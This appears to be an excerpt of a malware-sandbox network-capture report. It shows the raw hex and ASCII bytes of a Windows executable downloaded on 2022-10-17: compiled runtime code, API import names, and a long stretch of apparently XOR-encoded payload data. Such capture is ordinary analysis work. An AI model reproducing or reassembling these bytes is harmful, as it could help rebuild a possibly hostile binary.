                                                                                                                                  2022-10-17 20:07:22 UTC1266INData Raw: 6a 01 ff 70 08 e8 7e 23 00 00 83 c4 18 85 c0 0f 85 39 ff ff ff e8 3a 73 ff ff c7 00 2a 00 00 00 33 c0 66 89 07 eb 41 39 b0 a8 00 00 00 75 11 8b 75 0c 8d 4e 01 8a 06 46 84 c0 75 f9 2b f1 eb 28 56 56 83 ce ff 56 ff 75 0c 6a 09 51 e8 37 23 00 00 83 c4 18 85 c0 75 0d e8 f7 72 ff ff c7 00 2a 00 00 00 eb 03 8d 70 ff 80 7d f0 00 74 0a 8b 4d e4 83 a1 50 03 00 00 fd 8b c6 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 10 53 8b 5d 10 56 57 8b 7d 0c 33 f6 85 ff 75 3b 85 db 75 3b 85 ff 74 05 33 c0 66 89 07 8b 45 08 85 c0 74 02 89 30 ff 75 1c 8d 4d f0 e8 80 41 ff ff 8b c3 39 5d 18 77 03 8b 45 18 3d ff ff ff 7f 76 1e e8 87 72 ff ff 6a 16 eb 58 85 db 75 c5 e8 7a 72 ff ff 6a 16 5e 89 30 e8 66 53 ff ff eb 72 8d 4d f4 51 50 ff 75 14 57 e8 e8 fd ff ff 83 c4 10 83 f8 ff 75 12 85 ff 74
                                                                                                                                  Data Ascii: jp~#9:s*3fA9uuNFu+(VVVujQ7#ur*p}tMP_^[US]VW}3u;u;t3fEt0uMA9]wE=vrjXuzrj^0fSrMQPuWut
                                                                                                                                  2022-10-17 20:07:22 UTC1273INData Raw: 00 00 8d a4 24 00 00 00 00 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 09 c6 85 70 ff ff ff 00 eb 07 c6 85 70 ff ff ff 00 de c1 c3 8d a4 24 00 00 00 00 90 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 20 d9 c9 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 09 c6 85 70 ff ff ff 00 eb 07 c6 85 70 ff ff ff 01 de c1 c3 90 dd d8 dd d8 db 2d b0 84 42 00 80 bd 70 ff ff ff 00 7f 07 c6 85 70 ff ff ff 01 0a c9 c3 8d 49 00 dd d8 dd d8 db 2d c4 84 42 00 0a ed 74 02 d9 e0 0a c9 74 08 dd 05 d6 84 42 00 de c9 c3 0a c9 74 02 d9 e0 c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 c4 e0 89 45 e0 8b 45 18 89 45 f0 8b 45 1c 89 45 f4 eb 09 55 8b ec 83 c4 e0 89 45 e0 dd 5d f8 89 4d e4 8b 45 10 8b 4d 14 89 45 e8 89 4d ec 8d 45 08 8d
                                                                                                                                  Data Ascii: $bbi@tpp$bbi@t bbi@tpp-BppI-BttBtUEEEEEUE]MEMEME
                                                                                                                                  2022-10-17 20:07:22 UTC1281INData Raw: ff 59 89 75 fc 8b fe a1 00 67 45 00 89 7d e0 39 45 08 7c 1f 39 34 bd 00 65 45 00 75 31 e8 ed fe ff ff 89 04 bd 00 65 45 00 85 c0 75 14 6a 0c 5e 89 75 e4 c7 45 fc fe ff ff ff e8 15 00 00 00 eb a2 a1 00 67 45 00 83 c0 40 a3 00 67 45 00 47 eb bb 8b 75 e4 6a 07 e8 64 16 ff ff 59 c3 8b ff 55 8b ec 8b 45 08 8b c8 83 e0 3f c1 f9 06 6b c0 38 03 04 8d 00 65 45 00 50 ff 15 08 40 42 00 5d c3 8b ff 55 8b ec 8b 45 08 8b c8 83 e0 3f c1 f9 06 6b c0 38 03 04 8d 00 65 45 00 50 ff 15 0c 40 42 00 5d c3 8b ff 55 8b ec 53 56 8b 75 08 57 85 f6 78 67 3b 35 00 67 45 00 73 5f 8b c6 8b fe 83 e0 3f c1 ff 06 6b d8 38 8b 04 bd 00 65 45 00 f6 44 03 28 01 74 44 83 7c 03 18 ff 74 3d e8 c3 4f ff ff 83 f8 01 75 23 33 c0 2b f0 74 14 83 ee 01 74 0a 83 ee 01 75 13 50 6a f4 eb 08 50 6a f5 eb
                                                                                                                                  Data Ascii: YugE}9E|94eEu1eEuj^uEgE@gEGujdYUE?k8eEP@B]UE?k8eEP@B]USVuWxg;5gEs_?k8eED(tD|t=Ou#3+ttuPjPj
                                                                                                                                  2022-10-17 20:07:22 UTC1289INData Raw: 59 59 85 c0 75 1f 57 33 db 53 56 e8 63 02 00 00 83 c4 0c 85 c0 74 0e 81 0f 00 01 00 00 39 5f 04 75 03 89 77 04 8b 07 c1 e8 02 f7 d0 83 e0 01 eb 05 33 c0 89 07 40 8b 4d fc 5f 5e 33 cd 5b e8 3b 97 fe ff c9 c2 04 00 8b ff 55 8b ec 81 ec f4 00 00 00 a1 18 20 43 00 33 c5 89 45 fc 53 56 8b 75 08 57 e8 e8 5a ff ff 8b d8 e8 e1 5a ff ff 56 8b b8 4c 03 00 00 e8 a2 00 00 00 59 8b 4b 60 8b f0 f7 d9 8d 85 0c ff ff ff 6a 78 1b c9 81 e1 02 f0 ff ff 50 81 c1 01 10 00 00 51 56 ff 15 d0 40 42 00 85 c0 75 05 21 07 40 eb 61 8d 85 0c ff ff ff 50 ff 73 50 e8 be c6 ff ff 59 59 8b 4b 60 85 c0 75 09 85 c9 75 32 57 6a 01 eb 20 85 c9 75 32 39 4b 5c 74 2d 8d 85 0c ff ff ff 50 ff 73 50 e8 94 c6 ff ff 59 59 85 c0 75 18 57 50 56 e8 82 01 00 00 83 c4 0c 85 c0 74 09 83 0f 04 89 77 04 89
                                                                                                                                  Data Ascii: YYuW3SVct9_uw3@M_^3[;U C3ESVuWZZVLYK`jxPQV@Bu!@aPsPYYK`uu2Wj u29K\t-PsPYYuWPVtw
                                                                                                                                  2022-10-17 20:07:22 UTC1297INData Raw: f6 ff ff 89 85 2c fe ff ff 8d 85 a0 f6 ff ff 50 8d 85 30 fe ff ff 56 50 e8 97 e3 fe ff 83 c4 10 32 c0 e9 22 ff ff ff 83 a5 9c f6 ff ff 00 83 a5 2c fe ff ff 00 6a 00 eb 0f 33 c0 50 89 85 2c fe ff ff 89 85 9c f6 ff ff 8d 85 a0 f6 ff ff 50 8d 85 30 fe ff ff 56 50 e8 58 e3 fe ff 83 c4 10 8b 8d 2c fe ff ff 8b bd 9c f8 ff ff 89 bd b8 f8 ff ff 85 c9 74 7a 83 a5 b4 f8 ff ff 00 33 ff 8b 84 bd 30 fe ff ff 6a 0a 5a f7 e2 03 85 b4 f8 ff ff 89 84 bd 30 fe ff ff 83 d2 00 47 89 95 b4 f8 ff ff 3b f9 75 d9 8b bd b8 f8 ff ff 85 d2 74 40 8b 85 2c fe ff ff 83 f8 73 73 0f 89 94 85 30 fe ff ff ff 85 2c fe ff ff eb 26 33 c0 50 89 85 9c f6 ff ff 89 85 2c fe ff ff 8d 85 a0 f6 ff ff 50 8d 85 30 fe ff ff 56 50 e8 c8 e2 fe ff 83 c4 10 8d 85 5c fc ff ff 50 8d 85 2c fe ff ff 50 e8 c7
                                                                                                                                  Data Ascii: ,P0VP2",j3P,P0VPX,tz30jZ0G;ut@,ss0,&3P,P0VP\P,P
                                                                                                                                  2022-10-17 20:07:22 UTC1305INData Raw: 83 c2 14 89 54 24 08 89 54 24 04 89 14 24 e8 ba ed ff ff 83 c4 10 dd 44 24 04 c3 f3 0f 7e 44 24 04 66 0f f3 ca 66 0f 28 d8 66 0f c2 c1 06 3d ff 03 00 00 7c 25 3d 32 04 00 00 7f b0 66 0f 54 05 80 ec 42 00 f2 0f 58 c8 66 0f d6 4c 24 04 dd 44 24 04 c3 dd 05 c0 ec 42 00 c3 66 0f c2 1d a0 ec 42 00 06 66 0f 54 1d 80 ec 42 00 66 0f d6 5c 24 04 dd 44 24 04 c3 33 c0 50 50 6a 03 50 6a 03 68 00 00 00 40 68 c8 ec 42 00 ff 15 74 40 42 00 a3 60 2a 43 00 c3 8b 0d 60 2a 43 00 83 f9 fe 75 0b e8 d1 ff ff ff 8b 0d 60 2a 43 00 33 c0 83 f9 ff 0f 95 c0 c3 a1 60 2a 43 00 83 f8 ff 74 0c 83 f8 fe 74 07 50 ff 15 30 40 42 00 c3 8b ff 55 8b ec 56 6a 00 ff 75 10 ff 75 0c ff 75 08 ff 35 60 2a 43 00 ff 15 30 41 42 00 8b f0 85 f6 75 2d ff 15 80 40 42 00 83 f8 06 75 22 e8 b6 ff ff ff e8
                                                                                                                                  Data Ascii: T$T$$D$~D$ff(f=|%=2fTBXfL$D$BfBfTBf\$D$3PPjPjh@hBt@B`*C`*Cu`*C3`*CttP0@BUVjuuu5`*C0ABu-@Bu"
                                                                                                                                  2022-10-17 20:07:22 UTC1312INData Raw: 00 01 00 00 00 28 00 00 00 06 00 00 00 16 00 00 00 7b 00 00 00 02 00 00 00 57 00 00 00 16 00 00 00 21 00 00 00 27 00 00 00 d4 00 00 00 27 00 00 00 83 00 00 00 16 00 00 00 e6 03 00 00 0d 00 00 00 08 00 00 00 0c 00 00 00 15 00 00 00 0b 00 00 00 11 00 00 00 12 00 00 00 32 00 00 00 81 00 00 00 6e 00 00 00 05 00 00 00 61 09 00 00 10 00 00 00 e3 03 00 00 69 00 00 00 0e 00 00 00 0c 00 00 00 03 00 00 00 02 00 00 00 1e 00 00 00 05 00 00 00 29 11 00 00 16 00 00 00 d5 04 00 00 0b 00 00 00 19 00 00 00 05 00 00 00 20 00 00 00 0d 00 00 00 04 00 00 00 18 00 00 00 1d 00 00 00 05 00 00 00 13 00 00 00 0d 00 00 00 1d 27 00 00 0d 00 00 00 40 27 00 00 64 00 00 00 41 27 00 00 65 00 00 00 3f 27 00 00 66 00 00 00 35 27 00 00 67 00 00 00 19 27 00 00 09 00 00 00 45 27 00 00 6a 00
                                                                                                                                  Data Ascii: ({W!''2nai) '@'dA'e?'f5'g'E'j
                                                                                                                                  2022-10-17 20:07:22 UTC1320INData Raw: 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95
                                                                                                                                  Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
                                                                                                                                  2022-10-17 20:07:22 UTC1328INData Raw: 00 03 00 00 00 10 00 00 00 47 65 74 55 73 65 72 44 65 66 61 75 6c 74 4c 6f 63 61 6c 65 4e 61 6d 65 00 00 00 00 07 00 00 00 10 00 00 00 03 00 00 00 10 00 00 00 49 73 56 61 6c 69 64 4c 6f 63 61 6c 65 4e 61 6d 65 00 00 00 03 00 00 00 10 00 00 00 4c 43 4d 61 70 53 74 72 69 6e 67 45 78 00 00 00 04 00 00 00 10 00 00 00 4c 43 49 44 54 6f 4c 6f 63 61 6c 65 4e 61 6d 65 00 00 00 00 03 00 00 00 10 00 00 00 4c 6f 63 61 6c 65 4e 61 6d 65 54 6f 4c 43 49 44 00 00 00 00 12 00 00 00 41 70 70 50 6f 6c 69 63 79 47 65 74 50 72 6f 63 65 73 73 54 65 72 6d 69 6e 61 74 69 6f 6e 4d 65 74 68 6f 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 43 00 00 00 00 00 00 38 43 ff ff ff ff ff ff 0f 00 ff ff ff ff ff ff 0f 00 00 00 00 00 00 00 f0 3f 00 00 00 00 00 00 f0 3f ff ff ff ff ff ff
                                                                                                                                  Data Ascii: GetUserDefaultLocaleNameIsValidLocaleNameLCMapStringExLCIDToLocaleNameLocaleNameToLCIDAppPolicyGetProcessTerminationMethod8C8C??
                                                                                                                                  2022-10-17 20:07:22 UTC1336INData Raw: 00 2d 00 4d 00 4f 00 00 00 64 00 65 00 2d 00 4c 00 49 00 00 00 65 00 6e 00 2d 00 4e 00 5a 00 00 00 65 00 73 00 2d 00 43 00 52 00 00 00 66 00 72 00 2d 00 4c 00 55 00 00 00 62 00 73 00 2d 00 42 00 41 00 2d 00 4c 00 61 00 74 00 6e 00 00 00 00 00 73 00 6d 00 6a 00 2d 00 53 00 45 00 00 00 00 00 61 00 72 00 2d 00 4d 00 41 00 00 00 65 00 6e 00 2d 00 49 00 45 00 00 00 65 00 73 00 2d 00 50 00 41 00 00 00 66 00 72 00 2d 00 4d 00 43 00 00 00 73 00 72 00 2d 00 42 00 41 00 2d 00 4c 00 61 00 74 00 6e 00 00 00 00 00 73 00 6d 00 61 00 2d 00 4e 00 4f 00 00 00 00 00 61 00 72 00 2d 00 54 00 4e 00 00 00 65 00 6e 00 2d 00 5a 00 41 00 00 00 65 00 73 00 2d 00 44 00 4f 00 00 00 73 00 72 00 2d 00 42 00 41 00 2d 00 43 00 79 00 72 00 6c 00 00 00 00 00 73 00 6d 00 61 00 2d 00 53 00
                                                                                                                                  Data Ascii: -MOde-LIen-NZes-CRfr-LUbs-BA-Latnsmj-SEar-MAen-IEes-PAfr-MCsr-BA-Latnsma-NOar-TNen-ZAes-DOsr-BA-Cyrlsma-S
                                                                                                                                  2022-10-17 20:07:22 UTC1344INData Raw: 3f 00 00 00 00 40 d9 ef 3f 00 00 00 00 40 d8 ef 3f 00 00 00 00 40 d7 ef 3f 00 00 00 00 40 d6 ef 3f 00 00 00 00 40 d5 ef 3f 00 00 00 00 40 d4 ef 3f 00 00 00 00 40 d3 ef 3f 00 00 00 00 80 d2 ef 3f 00 00 00 00 80 d1 ef 3f 00 00 00 00 80 d0 ef 3f 00 00 00 00 80 cf ef 3f 00 00 00 00 80 ce ef 3f 00 00 00 00 80 cd ef 3f 00 00 00 00 80 cc ef 3f 00 00 00 00 80 cb ef 3f 00 00 00 00 80 ca ef 3f 00 00 00 00 80 c9 ef 3f 00 00 00 00 80 c8 ef 3f 00 00 00 00 80 c7 ef 3f 00 00 00 00 80 c6 ef 3f 00 00 00 00 80 c5 ef 3f 00 00 00 00 80 c4 ef 3f 00 00 00 00 80 c3 ef 3f 00 00 00 00 80 c2 ef 3f 00 00 00 00 80 c1 ef 3f 00 00 00 00 00 10 f0 3f 00 00 00 00 c0 0f f0 3f 00 00 00 00 80 0f f0 3f 00 00 00 00 40 0f f0 3f 00 00 00 00 00 0f f0 3f 00 00 00 00 c0 0e f0 3f 00 00 00 00 80 0e
                                                                                                                                  Data Ascii: ?@?@?@?@?@?@?@??????????????????????@???
                                                                                                                                  2022-10-17 20:07:22 UTC1369INData Raw: bf 71 d1 12 f9 df d1 33 bd 00 00 00 92 ec 3f 05 bf 3a 1a 91 52 ae a5 24 bd 00 00 00 40 ed df 04 bf dc 8e 9f 24 0f 05 3d bd 00 00 00 ec ed 7f 04 bf 0e 4b 92 dd 02 d1 27 bd 00 00 00 5c ee 3f 04 bf 81 d0 aa 7b 95 62 3e bd 00 00 00 02 ef df 03 bf a0 f2 24 45 ad 76 43 bd 00 00 00 a6 ef 7f 03 bf 49 e9 77 38 91 52 27 bd 00 00 00 46 f0 1f 03 bf 47 f8 5f 6a b2 2c 29 bd 00 00 00 e2 f0 bf 02 bf ae 2b 6a ec 42 da 44 bd 00 00 00 7c f1 5f 02 bf 0b 60 6b 05 e4 81 41 bd 00 00 00 12 f2 ff 01 bf 25 27 72 a7 0c 42 4c bd 00 00 00 a6 f2 9f 01 bf 09 bc 54 94 b9 1a 45 bd 00 00 00 06 f3 5f 01 bf 11 12 c6 fa 02 47 4f bd 00 00 00 96 f3 ff 00 bf e3 23 1e 69 bf cc 23 bd 00 00 00 20 f4 9f 00 bf 3b 8a de 5e d8 b7 48 bd 00 00 00 a8 f4 3f 00 bf 36 28 60 4a f9 94 4a bd 00 00 00 5c ea bf
                                                                                                                                  Data Ascii: q3?:R$@$=K'\?{b>$EvCIw8R'FG_j,)+jBD|_`kA%'rBLTE_GO#i# ;^H?6(`JJ\
                                                                                                                                  2022-10-17 20:07:22 UTC1377INData Raw: 00 80 fe 42 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 20 ff 42 00 00 57 45 00 04 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 a8 ff 42 00 70 01 43 00 74 ff 42 00 cc fe 42 00 80 fe 42 00 00 00 00 00 00 00 00 00 01 00 00 00 03 00 00 00 f0 01 43 00 00 00 00 00 01 00 00 00 04 00 00 00 24 02 43 00 9c 57 45 00 02 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 04 ff 42 00 00 00 00 00 00 00 00 00 02 00 00 00 14 ff 42 00 00 00 00 00 00 00 00 00 01 00 00 00 50 ff 42 00 00 00 00 00 00 00 00 00 00 00 00 00 44 57 45 00 c0 00 43 00 00 00 00 00 00 00 00 00 00 00 00 00 80 57 45 00 4c 00 43 00 0c 5a 45 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 44 fe 42 00 00 00 00 00 00 00 00 00 03 00 00 00 80 fd 42 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii: B BWE@BpCtBBBC$CWE@BBPBDWECWELCZE@DBB
                                                                                                                                  2022-10-17 20:07:22 UTC1385INData Raw: 64 46 69 72 73 74 46 69 6c 65 45 78 57 00 00 8f 01 46 69 6e 64 4e 65 78 74 46 69 6c 65 57 00 8f 03 49 73 56 61 6c 69 64 43 6f 64 65 50 61 67 65 00 b5 01 47 65 74 41 43 50 00 00 9a 02 47 65 74 4f 45 4d 43 50 00 00 3a 02 47 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 74 72 69 6e 67 73 57 00 00 ad 01 46 72 65 65 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 74 72 69 6e 67 73 57 00 16 05 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 57 00 b7 02 47 65 74 50 72 6f 63 65 73 73 48 65 61 70 00 00 4e 05 53 65 74 53 74 64 48 61 6e 64 6c 65 00 00 51 03 48 65 61 70 53 69 7a 65 00 00 ce 00 43 72 65 61 74 65 46 69 6c 65 57 00 15 06 57 72 69 74 65 43 6f 6e 73 6f 6c 65 57 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 01 00
                                                                                                                                  Data Ascii: dFirstFileExWFindNextFileWIsValidCodePageGetACPGetOEMCP:GetEnvironmentStringsWFreeEnvironmentStringsWSetEnvironmentVariableWGetProcessHeapNSetStdHandleQHeapSizeCreateFileWWriteConsoleW
                                                                                                                                  2022-10-17 20:07:22 UTC1392INData Raw: 91 92 74 6b 91 0f 74 6b 80 06 07 2e 91 06 7e 61 91 19 6b e6 09 06 74 6a b4 d6 9e 6b 91 02 5c 21 91 06 7e 18 da 06 74 61 8e 1c 5c 0e 91 06 7e 43 f7 06 74 61 9a 19 69 e6 09 06 74 6a b4 d6 81 6b 91 02 5c 21 91 06 7e 18 da 06 74 61 8e 1c 5c 0e 91 06 7e 43 f7 06 74 61 9d 01 5c 26 91 06 7e 66 98 2a 7b 6b 97 01 5c 61 91 06 72 04 f6 06 74 61 91 06 7c 43 dc 06 74 61 82 02 65 6f bd 09 74 6d 99 2e 7e 6b 91 00 1b 0c 91 06 7e 6b 91 06 aa 6e b7 06 74 b5 91 00 67 6e ba 06 65 6e bb 07 64 6b 91 06 74 6c 91 86 f3 6b 94 12 74 6b 90 1d 44 69 91 bf 74 6b 91 0c 74 6b 80 06 07 2e 91 06 7e 61 91 04 07 03 91 06 7e 60 e2 6f 74 6b 9b 0a 7c 6c fe 6c 74 6b 9b 06 74 63 fe 6d 74 6b 9b 69 18 6b 91 0c 62 04 fc 06 74 61 fe 6a 74 6b 9b 69 1a 6b 91 0c 79 40 df 0f 1b 71 91 06 7e 1f b0 06 74
                                                                                                                                  Data Ascii: tktk.~aktjk\!~ta\~Ctaitjk\!~ta\~Cta\&~f*{k\arta|Ctaeotm.~k~kntgnendktlktkDitktk.~a~`otk|lltktcmtkikbtajtkiky@q~t
                                                                                                                                  2022-10-17 20:07:22 UTC1400INData Raw: 85 f8 72 0a 91 06 72 18 ef 06 74 6d 33 23 6b 67 85 f8 72 09 91 06 72 18 ef 06 74 6d 33 23 6b 66 85 f8 72 08 91 06 72 18 ef 06 74 6d 33 23 6b 65 85 f8 72 30 91 06 72 18 ef 06 74 6d 33 2e f7 6b 91 00 74 77 1c 08 74 6b 93 23 62 7f 6f 00 20 6b 91 00 07 15 91 06 72 c9 b4 11 60 95 97 54 74 6b 97 75 0a 6b 91 00 d6 4e 89 12 8a 6d c0 06 74 6d e2 78 74 6b 97 a4 51 72 85 f8 72 3b 91 06 72 18 ef 06 74 6d 33 23 6e 7f 6f 00 3b 6b 91 00 07 15 91 06 72 c9 b4 1d 60 95 97 55 74 6b 97 75 0a 6b 91 00 d6 43 14 06 74 6d 91 00 07 ab 91 06 7e 16 aa 07 74 6f b9 84 74 6b 97 00 8a 6d 0d 04 74 6d e2 c7 74 6b 9b 2e 67 6b 91 2d 5c 7f 91 06 5f 43 12 06 74 6d 91 2e f0 6b 91 00 72 95 97 9b 76 6b 97 75 b5 6b 91 0c 5c 78 91 06 5f 43 85 06 74 40 b9 83 74 6b 97 06 5e 6b 91 15 44 68 91 08 74
                                                                                                                                  Data Ascii: rrtm3#kgrrtm3#kfrrtm3#ker0rtm3.ktwtk#bo kr`TtkukNmtmxtkQrr;rtm3#no;kr`UtkukCtm~totkmtmtk.gk-\_Ctm.krvkuk\x_Ct@tk^kDht
                                                                                                                                  2022-10-17 20:07:22 UTC1408INData Raw: ba 0c 74 79 98 2e 3d 6b 91 0c 59 bc 4f 09 66 62 6f 10 7c 6b 91 1d 1b 7d 91 06 7e 6b 4d 17 7c 78 9d 17 78 47 92 06 5f 79 91 01 65 6d 92 02 5c e6 91 06 72 43 8a 06 74 40 9a 06 65 6e fe 11 74 6b 9b 3c 06 94 6e f9 aa 66 80 03 58 63 80 03 1b 7d 91 06 7e 6b 4d 06 aa 6e b7 06 74 b5 91 06 74 6f 82 0b 62 78 9f 2d 53 7a 9c 17 7a f1 82 09 74 6b 96 04 65 64 b9 eb 74 6b 9b 2e 6f 6b 91 2d 7f 6b 4f 03 52 6b 91 d8 74 6b 80 08 63 33 82 08 65 65 80 0b fa 02 a3 d7 73 78 81 2d 74 7a 81 2c 74 6b 91 07 40 6b 91 04 74 bf 91 2b 75 6a 9e 06 74 6b 91 04 74 cd 91 93 4f 6a 9c 06 74 6b 91 06 74 f8 91 be 3f 6a 94 12 74 6b 90 06 74 09 90 15 01 6a 94 12 74 6b 90 15 44 68 91 41 74 6b 91 1f 74 6b 80 06 70 04 a2 06 74 61 fe 32 74 6b 9b 19 6e 43 f4 06 74 61 e3 23 77 6b e1 2e 4f 6b 91 0c 0a
                                                                                                                                  Data Ascii: ty.=kYOfbo|k}~kM|xxG_yem\rCt@entk<nfXc}~kMnttobx-Szztkedtk.ok-kORktkc3eesx-tz,tk@kt+ujtktOjtkt?jtktjtkDhAtktkpta2tknCta#wk.Ok
                                                                                                                                  2022-10-17 20:07:22 UTC1416INData Raw: 82 00 4c e3 91 06 74 6b 80 00 63 32 92 f8 70 7d 6f 07 67 67 80 0a 58 2d 91 00 65 6e 93 7d 7b 6b 91 02 65 6d 00 0f 63 32 8e 19 2b 08 b1 f9 74 6b 91 0f 6b 74 ce 65 2b 69 ea 09 74 6b 95 17 72 7c c8 97 65 6f 8e 19 2b 09 f1 d4 e8 62 86 5e 79 7a 94 11 2c 78 94 17 70 7c c8 15 70 6b ba 2c 7c 7d 6f 07 67 66 80 0b 58 4b 97 17 71 69 ea 09 74 6b 95 17 72 fa 98 11 2d 74 8e 59 17 4b 6e 06 74 6b 98 19 6b 34 f2 59 a6 f7 80 00 61 33 82 00 74 7a 97 05 8a 6f 87 f8 75 78 9f 17 7a 51 f6 f9 8b 94 97 10 5c 60 90 06 7e 78 99 d8 7c 4d 91 10 1e 78 99 d8 74 7a 99 2c 74 6b 91 47 68 6b 91 06 74 6b 91 07 74 6b 91 33 75 6b 91 30 75 6b 91 0e 74 6b 91 12 74 6b 90 15 44 69 91 08 74 6b 91 19 74 6b 80 06 76 7c fb 59 63 01 6f 07 7e 40 91 00 5e 6b 91 15 44 69 91 14 74 6b 91 4b 74 6b 80 06 76
                                                                                                                                  Data Ascii: Ltkc2p}oggX-en}{kemc2+tkkte+itkr|eo+b^yz,xp|pk,|}ogfXKqitkr-tYKntkk4Ya3tzouxzQ\`~x|Mxtz,tkGhktktk3uk0uktktkDitktkv|Yco~@^kDitkKtkv
                                                                                                                                  2022-10-17 20:07:22 UTC1424INData Raw: 91 04 74 52 91 c6 8d 6b 9a 06 74 6b 91 04 74 5a 91 d0 73 6a 9a 06 74 6b 91 06 74 7d 91 f9 61 6a 94 12 74 6b 90 1d 44 68 91 7f 74 6b 91 6c 74 6b 80 06 74 6b 91 2e ec 6a 91 0c 59 6c e3 f6 40 6b e1 2d 71 19 69 32 74 1b 9b 06 aa 60 b7 06 06 6b a4 06 04 61 91 d8 74 19 99 33 74 1b e3 64 41 6b e1 2e 92 6b 91 00 7f 19 99 33 74 1b e3 7c 41 6b e1 2e 92 6b 91 00 78 6c b9 30 74 6b 9b 10 8a 6a 9c 0f 58 7a 91 01 06 4a 92 06 04 6d b9 74 74 6b 9b 15 70 b5 83 06 aa 6d 82 03 74 6b 4f 06 0a 45 91 06 7e 78 95 2d 74 7a 95 2c 74 6b 91 07 68 6b 91 06 74 68 91 1e 6f 6b 9a 1f 74 6b 90 06 74 6a 91 60 13 6b 97 1f 74 6b 90 1d 44 69 91 3e 74 6b 91 6d 74 6b 80 06 74 15 16 07 74 61 93 69 89 6b 91 0c 7e 6d bc 05 60 40 9d 00 77 43 6f 06 74 61 fe a0 74 6b 9b 23 59 6d b7 78 5a 6b 91 0c 7f
                                                                                                                                  Data Ascii: tRktktZsjtkt}ajtkDhtkltktk.jYl@k-qi2t`kat3tdAk.k3t|Ak.kxl0tkjXzJmttkpmtkOE~x-tz,tkhkthoktktj`ktkDi>tkmtkttaik~m`@wCotatk#YmxZk
                                                                                                                                  2022-10-17 20:07:22 UTC1432INData Raw: ec b1 74 6b 95 06 4c c3 91 06 74 68 fe e6 75 6b 9b 19 5a 5a 8e 05 1b 8b 90 06 7e 74 cf 29 61 68 fe e7 75 6b 9b 10 45 67 92 69 95 6a 91 0c 6b 74 6f 02 5f 6a 87 0d 73 47 88 06 76 7d ec b3 74 6b 95 04 63 16 27 06 74 6f 93 10 09 dc 91 06 70 6b ba 67 77 04 71 07 74 61 8e 5b 45 49 92 69 94 6a 91 0c 54 fd 91 06 74 44 84 05 1b 8a 90 06 7e 7d a0 0a 77 04 70 07 74 61 8e 19 8a 6f ba 07 62 67 99 2a 6d 6b 93 10 09 de 91 06 70 69 87 7b c2 6b 91 02 76 7c ec b1 74 6b 95 06 5f 7c 91 04 62 16 24 06 74 6f 93 10 09 dd 91 06 70 69 87 7b c3 6b 91 02 74 69 b9 a7 75 6b 9b 06 5e f1 91 04 77 43 24 07 74 61 91 04 62 16 24 06 74 6f 93 10 09 dd 91 06 70 69 87 7b c3 6b 91 02 76 43 30 07 74 61 91 2c 16 6b 93 05 5c d8 90 06 7e 6b 93 2e c6 6a 91 0c 52 69 b9 a7 75 6b 9b 06 5e 6b 91 15 44
                                                                                                                                  Data Ascii: tkLthukZZ~t)ahukEgijkto_jsGv}tkc'topkgwqta[EIijTtD~}wptaobg*mkpi{kv|tk_|b$topi{ktiuk^wC$tab$topi{kvC0ta,k\~k.jRiuk^kD
                                                                                                                                  2022-10-17 20:07:22 UTC1439INData Raw: bd 28 74 d5 dd 66 37 49 91 ff 52 d1 a1 24 74 58 b7 bc 44 49 91 3c 53 d1 a1 24 74 8a c1 bc 44 49 91 76 5d d1 a1 28 74 cc d6 66 37 45 91 3c 4c 0b d2 18 74 e4 da ea 58 45 91 1e 58 0b d2 28 74 35 a3 66 37 45 91 78 52 0b d2 28 74 cb a1 66 37 45 91 eb 44 0b d2 28 74 f7 a1 66 37 45 91 70 49 0b d2 28 74 49 d3 66 37 49 91 2b 5d d1 a1 28 74 e0 df 66 37 45 91 b2 3d 0b d2 28 74 3c d3 66 37 45 91 30 36 0b d2 18 74 54 da 13 39 61 91 50 55 0d a9 00 74 b0 bd 15 46 6d 91 4a 43 97 86 00 74 cc a9 15 46 6d 91 74 30 3f ae 00 74 b5 df 15 46 6d 91 78 55 78 a3 00 74 c6 bc fa 63 6d 91 fb 55 97 86 00 74 99 da 15 46 6d 91 f2 37 78 a3 00 74 96 d8 15 46 e8 93 9e 4d 6b 91 08 74 94 a9 44 45 65 91 4a 3d 29 a0 08 74 7c dd 44 45 6d 91 78 50 78 a3 00 74 fa b0 15 46 5d 91 e9 4d a3 a8 0c 74
